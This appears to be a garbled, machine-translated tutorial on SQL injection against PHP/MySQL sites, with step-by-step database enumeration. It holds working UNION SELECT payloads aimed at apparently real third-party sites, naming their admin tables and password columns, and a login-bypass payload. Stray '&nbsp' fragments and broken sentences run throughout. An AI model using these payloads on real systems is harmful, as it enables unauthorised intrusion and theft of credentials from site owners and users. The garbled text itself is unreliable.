Penetration Test 2

Scripting language-php Language Basics tutorial (annotation, input debug, accept Processing) SQL statements Tutorial (query, insert, modify update, etc.) instance writing SQL injection test page Php+mysql injection (on) How to see what is the submission method, right-click on the review element in Firefox browser, Can be displayed in the network options. To prevent SQL injection, change the corresponding statement to the following sentence Is_numeric is only allowed to enter the number  cmd call database   Show databases display database name           & nbsp                 show  tables   Display table name           &N Bsp   SELECT * FROM table name       Show data in this table   step  1. Find the page with parameters,  2. Enter the error parameter to see if the page is wrong, and if the error has an injection point   3. Binary guessing field by order statement by changing the number behind by, the number of 0 points is  4. If ASP injection skips this step (because Access does not have a database name, you can guess the table name directly for admin, and PHP injection first bursts the database name (If the statement does not have an error, it is changed to add an and 1=111, such as an error statement)  5. The number of errors is the database () database name  user () DB user  version () database version  @@ Version_compile_os server operating system   These replacements are queried    6. Query the table name query information_schema the table name under the name of the database tables information (condition: Table _schema=0x726f6f74 database named root)  information_schema.tables:information_schema database name table name tables records all table name information in all databases   Specific statement: http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1 , GROUP_CONCAT (table_name), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 From information_schema.tables where table_schema=0x726f6f74 (This is the 16-bit transcoding of the database name) parameter: Group_concat () burst all the table names and then query the column names for all column names under the table name Yzsoumember Information_ Schema.columns: Table Specific example that records all column name information in all databases: Http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1, Group_concat (column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 From Information_schema.columns where Table_name=0x797a736f756d656d626572 (This is the transcoding of the table name)  7. The last step is the same as ASP injection, after knowing the table name and column name, the input statement bursts the user name and password   access data hierarchy                     &N                . Bsp             column name                       &N Bsp           content MySQL data hierarchy                    database name &NB Sp                           &N     name   Bsp                          ,         &NB Sp   Column name                                 nbsp               content   mysql    information_schema    root& nbsp      yzsoumember            username,password          &NB Sp     Content    difference: The asp+access database is stored in the Site directory (can penetrate), the suffix format mdb,asp,asaphp+mysql database is stored under the database installation path (inaccessible), Suffix format myi,myd,frm.asp+access injection belongs to brute injection  mysql5.0 above injection INFORMATION_SCHEMA: stores the table name and column name information under all databases   database () database name  user () database user  version () database version  @ @version_compile_os server operating system   windows case insensitive Linux Case Sensitive          http://www.makita.com.cn mutia0121    admin        name,adminpass http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_ CONCAT (table_name), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table _schema=0x6d7574696130313231  http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat ( column_name), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Information_schema.coluMNS where table_name=0x61646d696e    http://www.wh3z.cn/hdm1040458_db    Intwho_ admin_user            user_name,password http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,GROUP_CONCAT (table_name), 5,6,7,8,9,10,11,12,13,14,15,16,17 from Information_schema.tables where table_schema=0x68646d313034303435385f6462 http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_ Concat (column_name), 5,6,7,8,9,10,11,12,13,14,15,16,17 from Information_schema.columns where table_name= 0x696e7477686f5f61646d696e5f75736572  1. Two site Operations 2.php page Authoring  phpmyadmin    You can change the query statement by entering a specific SQL statement in the Login submission field. As input: admin ' or 1=1) #那么查询语句就成select user from PHP where (user= ' admin ' or 1=1) # ') and (pw= ' $pass ')         etc. In the Select User from PHP where (user= ' admin ' or 1=1)     Because # is an annotation character, the following is omitted   

Penetration Test 2